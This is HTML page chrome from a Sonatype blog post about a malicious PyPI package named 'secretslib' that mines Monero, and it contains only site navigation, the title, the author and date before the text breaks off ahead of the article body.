  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/lifecycle?topnav=true" role="menuitem" target="_self">Nexus Lifecycle<br><span class="small-menu-text">Eliminate OSS risk across the entire SDLC.</span></a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/firewall?topnav=true" role="menuitem" target="_self">Nexus Firewall<br><span class="small-menu-text">Protect Nexus and Artifactory repos from OSS risk.</span></a></li>
 </ul>
</div></span>

          
            <div id="hs_cos_wrapper_module_1612478720543859_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_inline_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="inline_rich_text" data-hs-cos-field="column_1_heading"><h4>Container Security</h4></div>
            <span id="hs_cos_wrapper_module_1612478720543859_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_1612478720543859_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/container?topnav=true" role="menuitem" target="_self">Nexus Container<br><span class="small-menu-text">Identify and remediate OSS risk in containers for build and run-time protection.</span></a></li>
 </ul>
</div></span>

          
        </div>
        <div class="menu-col2 mega-links two_col">
          
            <div id="hs_cos_wrapper_module_1612478720543859_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_inline_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="inline_rich_text" data-hs-cos-field="column_2_heading"><h4>CODE QUALITY ANALYSIS</h4></div>
            <span id="hs_cos_wrapper_module_1612478720543859_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_1612478720543859_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/sonatype-lift" role="menuitem" target="_self">Sonatype Lift<br><span class="small-menu-text">Find and fix security, performance, and reliability bugs during code review.</span></a></li>
 </ul>
</div></span>

          
            <div id="hs_cos_wrapper_module_1612478720543859_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_inline_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="inline_rich_text" data-hs-cos-field="column_2_heading"><h4>Repository MANAGEMENT</h4></div>
            <span id="hs_cos_wrapper_module_1612478720543859_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_1612478720543859_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/nexus-repository?topnav=true" role="menuitem" target="_self">Nexus Repository<br><span class="small-menu-text">Manage binaries and build artifacts.</span></a></li>
 </ul>
</div></span>

          
        </div>
    </div>
  </div>

</div>


  <div class="mega-container blue-menu-group">
    <div class="menu-title">
     
        <div class="themenus">
          <div class="menu-col1 mega-links two_col">
            
              <div id="hs_cos_wrapper_module_1612478720543859_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_inline_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="inline_rich_text" data-hs-cos-field="column_1_heading"><a href="https://www.sonatype.com/products/software-supply-chain-management?topnav=true">
<h4>Complete Platform</h4>
</a></div>
              <span id="hs_cos_wrapper_module_1612478720543859_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_1612478720543859_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/software-supply-chain-management?topnav=true" role="menuitem" target="_self"><span class="small-menu-text">Automate your software supply chain security against every attack with Sonatype’s suite of products.</span></a></li>
 </ul>
</div></span>

            
          </div>
          <div class="menu-col2 mega-links two_col">
            
              <div id="hs_cos_wrapper_module_1612478720543859_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_inline_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="inline_rich_text" data-hs-cos-field="column_2_heading"><a href="https://www.sonatype.com/request-a-personalized-demo?topnav=true">
<h4>Book a Demo</h4>
</a></div>
              <span id="hs_cos_wrapper_module_1612478720543859_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_1612478720543859_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/request-a-personalized-demo?topnav=true" role="menuitem" target="_self"><span class="small-menu-text">Get a personalized demo and get your questions answered from a Sonatype expert.</span></a></li>
 </ul>
</div></span>

            
          </div>
      </div>
    </div>

  </div>
</div>

       </div><!--end widget-span -->
        </div><!--end row-->
</div><!--end row-wrapper -->

   </div><!--end widget-span -->
                     
</div>
    </div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-2 row-number-6 ">
<div class="row-fluid ">
<div class="mega-menu two">
  
<div class="span12 widget-span widget-type-cell " style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-2 row-number-7 ">
    <div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget " style="" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_module_1612479281042910" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><div class="mega-container ">
  <div class="menu-title">
   
      <div class="themenus">
        <div class="menu-col1 mega-links one_col">
          
            <div id="hs_cos_wrapper_module_1612479281042910_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_inline_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="inline_rich_text" data-hs-cos-field="column_1_heading"><h4>For Professionals</h4></div>
            <span id="hs_cos_wrapper_module_1612479281042910_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_1612479281042910_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/software-developers?topnav=true" role="menuitem" target="_self">Developers</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/appsec-professionals?topnav=true" role="menuitem" target="_self">Application Security</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/devsecops-leaders?topnav=true" role="menuitem" target="_self">DevSecOps</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/legal-and-compliance-officers?topnav=true" role="menuitem" target="_self">Legal &amp; Compliance</a></li>
 </ul>
</div></span>

          
            <div id="hs_cos_wrapper_module_1612479281042910_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_inline_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="inline_rich_text" data-hs-cos-field="column_1_heading"><h4>For Industries</h4></div>
            <span id="hs_cos_wrapper_module_1612479281042910_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_1612479281042910_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/government?topnav=true" role="menuitem" target="_self">Government</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/banking-and-financial-services?topnav=true" role="menuitem" target="_self">Financial Services</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/manufacturing?topnav=true" role="menuitem" target="_self">Manufacturing</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/technology-and-software?topnav=true" role="menuitem" target="_self">Technology</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/solutions/healthcare?topnav=true" role="menuitem" target="_self">Healthcare</a></li>
 </ul>
</div></span>

          
        </div>
        <div class="menu-col2 mega-links one_col">
          
        </div>
    </div>
  </div>

</div>

</div>

       </div><!--end widget-span -->
        </div><!--end row-->
</div><!--end row-wrapper -->

   </div><!--end widget-span -->
                     
</div>
    </div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-2 row-number-8 ">
<div class="row-fluid ">
<div class="mega-menu three">
  
<div class="span12 widget-span widget-type-cell " style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-2 row-number-9 ">
    <div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget " style="" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_module_1612479744596943" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><div class="mega-container ">
  <div class="menu-title">
   
      <div class="themenus">
        <div class="menu-col1 mega-links two_col">
          
            <div id="hs_cos_wrapper_module_1612479744596943_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_inline_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="inline_rich_text" data-hs-cos-field="column_1_heading"><h4>Content</h4></div>
            <span id="hs_cos_wrapper_module_1612479744596943_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_1612479744596943_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/resources/log4j-vulnerability-resource-center?topnav=true" role="menuitem" target="_self">Log4j Resource Center</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/resources/whitepapers-reports-and-books?topnav=true" role="menuitem" target="_self">Whitepapers &amp; eBooks</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/resources/webinars?topnav=true" role="menuitem" target="_self">Webinars</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://video.sonatype.com/?topnav=true" role="menuitem" target="_self">Videos</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/customer-success?topnav=true" role="menuitem" target="_self">Customer Stories</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/resources/upcoming-events?topnav=true" role="menuitem" target="_self">Events</a></li>
 </ul>
</div></span>

          
            <div id="hs_cos_wrapper_module_1612479744596943_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_inline_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="inline_rich_text" data-hs-cos-field="column_1_heading"><h4>CUSTOMER Portal</h4></div>
            <span id="hs_cos_wrapper_module_1612479744596943_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_1612479744596943_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/training" role="menuitem" target="_self">Training &amp; Workshops</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://my.sonatype.com/?topnav=true" role="menuitem" target="_blank" rel="noopener">My Sonatype&nbsp;&nbsp;<i class="fa fa-external-link"></i><br><span class="small-menu-text">Customer support, product guides &amp; documentation, learning paths, community, and more.</span></a></li>
 </ul>
</div></span>

          
        </div>
        <div class="menu-col2 mega-links two_col">
          
            <div id="hs_cos_wrapper_module_1612479744596943_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_inline_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="inline_rich_text" data-hs-cos-field="column_2_heading"><h4>Integrations &amp; Free Tools</h4></div>
            <span id="hs_cos_wrapper_module_1612479744596943_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_1612479744596943_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/free-developer-tools" role="menuitem" target="_self">Free Developer Tools</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/integrations?topnav=true" role="menuitem" target="_self">Sonatype Integrations</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://ossindex.sonatype.org/?__hstc=31049440.d5ab0fbc6553211f149a678e47fa8ad9.1538587991933.1610484080896.1610550007599.1814&amp;__hssc=31049440.2.1610550007599&amp;__hsfp=2873996859" role="menuitem" target="_self">Sonatype OSS Index&nbsp;&nbsp;<i class="fa fa-external-link"></i></a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/vulnerability-scanner?topnav=true" role="menuitem" target="_self">Nexus Vulnerability Scanner</a></li>
 </ul>
</div></span>

          
        </div>
    </div>
  </div>

</div>

</div>

       </div><!--end widget-span -->
        </div><!--end row-->
</div><!--end row-wrapper -->

   </div><!--end widget-span -->
                     
</div>
    </div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-2 row-number-10 ">
<div class="row-fluid ">
<div class="mega-menu four">
  
<div class="span12 widget-span widget-type-cell " style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-2 row-number-11 ">
    <div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget " style="" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_module_1612480385524997" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><div class="mega-container ">
  <div class="menu-title">
   
      <div class="themenus">
        <div class="menu-col1 mega-links one_col">
          
            <div id="hs_cos_wrapper_module_1612480385524997_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_inline_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="inline_rich_text" data-hs-cos-field="column_1_heading"><h4>About us</h4></div>
            <span id="hs_cos_wrapper_module_1612480385524997_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_module_1612480385524997_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/company/?topnav=true" role="menuitem" target="_self">About Sonatype</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/products/intelligence?topnav=true" role="menuitem" target="_self">About Nexus Intelligence</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/company/analyst-recognition-and-insights?topnav=true" role="menuitem" target="_self">Analyst Recognition</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/partners?topnav=true" role="menuitem" target="_self">Partners</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/company/careers?topnav=true" role="menuitem" target="_self">Careers at Sonatype</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/press-releases?topnav=true" role="menuitem" target="_self">Press Releases</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.sonatype.com/company/media?topnav=true" role="menuitem" target="_self">Media</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://blog.sonatype.com" role="menuitem" target="_self">Blog</a></li>
 </ul>
</div></span>

          
            <div id="hs_cos_wrapper_module_1612480385524997_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_inline_rich_text" style="" data-hs-cos-general-type="widget" data-hs-cos-type="inline_rich_text" data-hs-cos-field="column_1_heading"><a href="https://www.sonatype.com/contactus?topnav=true">
<h4>Contact Us</h4>
</a></div>
            <span id="hs_cos_wrapper_module_1612480385524997_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><ul></ul></span>

          
        </div>
        <div class="menu-col2 mega-links one_col">
          
        </div>
    </div>
  </div>

</div>

</div>

       </div><!--end widget-span -->
        </div><!--end row-->
</div><!--end row-wrapper -->

   </div><!--end widget-span -->
                     
</div>
    </div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-1 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-raw_html smartling-language-selector" style="" data-widget-type="raw_html" data-x="0" data-w="12">
<div class="cell-wrapper layout-widget-wrapper">
<span id="hs_cos_wrapper_module_1525102768418461" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_raw_html" style="" data-hs-cos-general-type="widget" data-hs-cos-type="raw_html"><div id="smt-lang-selector"></div></span>
</div><!--end layout-widget-wrapper -->
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-2 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget " style="display:none;" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_module_1612478683514846" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"></div>

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->
</div>
</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

<div class="row-fluid-wrapper row-depth-1 row-number-2 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell blog-banner" style="display:none;" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-3 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell blog-banner-opacity" style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-4 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-raw_jinja hs-blog-header" style="" data-widget-type="raw_jinja" data-x="0" data-w="12">
<h1>Sonatype Blog</h1></div><!--end widget-span -->

</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

    </div><!--end header -->
</div><!--end header wrapper -->

<div class="body-container-wrapper">
    <div class="body-container container-fluid">

<div class="row-fluid-wrapper row-depth-1 row-number-1 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell sonatype-section" style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-2 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell " style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-3 ">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-blog_content " style="" data-widget-type="blog_content" data-x="0" data-w="12">
<div class="blog-section">

    <div class="row-fluid">
      <div class="span8 post-header" style="position:relative;">
          <h1><span id="hs_cos_wrapper_name" class="hs_cos_wrapper hs_cos_wrapper_meta_field hs_cos_wrapper_type_text" style="" data-hs-cos-general-type="meta_field" data-hs-cos-type="text">PyPI Package 'secretslib' Drops Fileless Linux Malware to Mine Monero</span></h1>
           <div class="sticky-social">
             <div class="social-align">
               <span id="hs_cos_wrapper_my_social_sharing" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_social_sharing" style="" data-hs-cos-general-type="widget" data-hs-cos-type="social_sharing"><a href="http://www.facebook.com/share.php?u=https%3A%2F%2Fblog.sonatype.com%2Fpypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero%3Futm_medium%3Dsocial%26utm_source%3Dfacebook" target="_blank" rel="noopener" style="width:24px;border-width:0px;border:0px;"><img src="https://blog.sonatype.com/hs-fs/hubfs/facebook-circle-trim.png?width=24&amp;name=facebook-circle-trim.png" class="hs-image-widget hs-image-social-sharing-24" style="max-height:24px;max-width:24px;border-width:0px;border:0px;" width="24" hspace="0" alt="Share on Facebook" loading="lazy" srcset="https://blog.sonatype.com/hs-fs/hubfs/facebook-circle-trim.png?width=12&amp;name=facebook-circle-trim.png 12w, https://blog.sonatype.com/hs-fs/hubfs/facebook-circle-trim.png?width=24&amp;name=facebook-circle-trim.png 24w, https://blog.sonatype.com/hs-fs/hubfs/facebook-circle-trim.png?width=36&amp;name=facebook-circle-trim.png 36w, https://blog.sonatype.com/hs-fs/hubfs/facebook-circle-trim.png?width=48&amp;name=facebook-circle-trim.png 48w, https://blog.sonatype.com/hs-fs/hubfs/facebook-circle-trim.png?width=60&amp;name=facebook-circle-trim.png 60w, https://blog.sonatype.com/hs-fs/hubfs/facebook-circle-trim.png?width=72&amp;name=facebook-circle-trim.png 72w" sizes="(max-width: 24px) 100vw, 24px"></a>&nbsp;<a href="http://www.linkedin.com/shareArticle?mini=true&amp;url=https%3A%2F%2Fblog.sonatype.com%2Fpypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero%3Futm_medium%3Dsocial%26utm_source%3Dlinkedin" target="_blank" rel="noopener" style="width:24px;border-width:0px;border:0px;"><img src="https://blog.sonatype.com/hs-fs/hubfs/Linked-In-Circle-trim.png?width=24&amp;name=Linked-In-Circle-trim.png" class="hs-image-widget hs-image-social-sharing-24" style="max-height:24px;max-width:24px;border-width:0px;border:0px;" width="24" hspace="0" alt="Share on LinkedIn" loading="lazy" srcset="https://blog.sonatype.com/hs-fs/hubfs/Linked-In-Circle-trim.png?width=12&amp;name=Linked-In-Circle-trim.png 12w, https://blog.sonatype.com/hs-fs/hubfs/Linked-In-Circle-trim.png?width=24&amp;name=Linked-In-Circle-trim.png 24w, https://blog.sonatype.com/hs-fs/hubfs/Linked-In-Circle-trim.png?width=36&amp;name=Linked-In-Circle-trim.png 36w, https://blog.sonatype.com/hs-fs/hubfs/Linked-In-Circle-trim.png?width=48&amp;name=Linked-In-Circle-trim.png 48w, https://blog.sonatype.com/hs-fs/hubfs/Linked-In-Circle-trim.png?width=60&amp;name=Linked-In-Circle-trim.png 60w, https://blog.sonatype.com/hs-fs/hubfs/Linked-In-Circle-trim.png?width=72&amp;name=Linked-In-Circle-trim.png 72w" sizes="(max-width: 24px) 100vw, 24px"></a>&nbsp;<a href="https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fblog.sonatype.com%2Fpypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero%3Futm_medium%3Dsocial%26utm_source%3Dtwitter&amp;url=https%3A%2F%2Fblog.sonatype.com%2Fpypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero%3Futm_medium%3Dsocial%26utm_source%3Dtwitter&amp;source=tweetbutton&amp;text=PyPI%20Package%20%27secretslib%27%20Drops%20Fileless%20Linux%20Malware%20to%20Mine%20Monero" target="_blank" rel="noopener" style="width:24px;border-width:0px;border:0px;"><img src="https://blog.sonatype.com/hs-fs/hubfs/Twitter-circle-trim.png?width=24&amp;name=Twitter-circle-trim.png" class="hs-image-widget hs-image-social-sharing-24" style="max-height:24px;max-width:24px;border-width:0px;border:0px;" width="24" hspace="0" alt="Share on Twitter" loading="lazy" srcset="https://blog.sonatype.com/hs-fs/hubfs/Twitter-circle-trim.png?width=12&amp;name=Twitter-circle-trim.png 12w, https://blog.sonatype.com/hs-fs/hubfs/Twitter-circle-trim.png?width=24&amp;name=Twitter-circle-trim.png 24w, https://blog.sonatype.com/hs-fs/hubfs/Twitter-circle-trim.png?width=36&amp;name=Twitter-circle-trim.png 36w, https://blog.sonatype.com/hs-fs/hubfs/Twitter-circle-trim.png?width=48&amp;name=Twitter-circle-trim.png 48w, https://blog.sonatype.com/hs-fs/hubfs/Twitter-circle-trim.png?width=60&amp;name=Twitter-circle-trim.png 60w, https://blog.sonatype.com/hs-fs/hubfs/Twitter-circle-trim.png?width=72&amp;name=Twitter-circle-trim.png 72w" sizes="(max-width: 24px) 100vw, 24px"></a>&nbsp;<a href="mailto:?subject=Check%20out%20https%3A%2F%2Fblog.sonatype.com%2Fpypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero%3Futm_medium%3Dsocial%26utm_source%3Demail%20&amp;body=Check%20out%20https%3A%2F%2Fblog.sonatype.com%2Fpypi-package-secretslib-drops-fileless-linux-malware-to-mine-monero%3Futm_medium%3Dsocial%26utm_source%3Demail" target="_blank" rel="noopener" style="width:24px;border-width:0px;border:0px;"><img src="https://blog.sonatype.com/hs-fs/hubfs/mail-circle.png?width=24&amp;name=mail-circle.png" class="hs-image-widget hs-image-social-sharing-24" style="max-height:24px;max-width:24px;border-width:0px;border:0px;" width="24" hspace="0" alt="Share on Email" loading="lazy" srcset="https://blog.sonatype.com/hs-fs/hubfs/mail-circle.png?width=12&amp;name=mail-circle.png 12w, https://blog.sonatype.com/hs-fs/hubfs/mail-circle.png?width=24&amp;name=mail-circle.png 24w, https://blog.sonatype.com/hs-fs/hubfs/mail-circle.png?width=36&amp;name=mail-circle.png 36w, https://blog.sonatype.com/hs-fs/hubfs/mail-circle.png?width=48&amp;name=mail-circle.png 48w, https://blog.sonatype.com/hs-fs/hubfs/mail-circle.png?width=60&amp;name=mail-circle.png 60w, https://blog.sonatype.com/hs-fs/hubfs/mail-circle.png?width=72&amp;name=mail-circle.png 72w" sizes="(max-width: 24px) 100vw, 24px"></a></span>
             </div>      
          </div>
      </div>
       <div class="span4">
      </div>
  </div>
    <div class="row-fluid">
        <div class="span8">
            <div class="blog-post-wrapper cell-wrapper">
               <div class="blog-section">
                    <div class="blog-post-wrapper cell-wrapper">
                        <div class="row-fluid">
                            <div class="span12">                                
                                <div class="row-fluid">
                                    <div class="span12">                                    
                                        <div class="section post-header">
                                          
                                            <div class="row-fluid">
                                                <div class="span9">
                                                   <div id="hubspot-author_data" class="hubspot-editable" data-hubspot-form-id="author_data" data-hubspot-name="Blog Author">
                                                      
                                                          August 11, 2022 By <a class="author-link" href="https://blog.sonatype.com/author/akshay-ax-sharma">Ax Sharma</a>                          
                                                     
                                                     
                                                      
                                                      
                                                      <p style="font-size:14px;margin-bottom: 0;"><em>7 minute read time</em></p>
                                                  </div>
                                               </div>
                                              <div class="span3">
                                                <div class="row-fluid mobile-social">
                                                    <div class="span4">
                                                       SHARE:&nbsp;
                                                    </div>
                                                    <div class="span8">
                                                        <div class="social-align ">
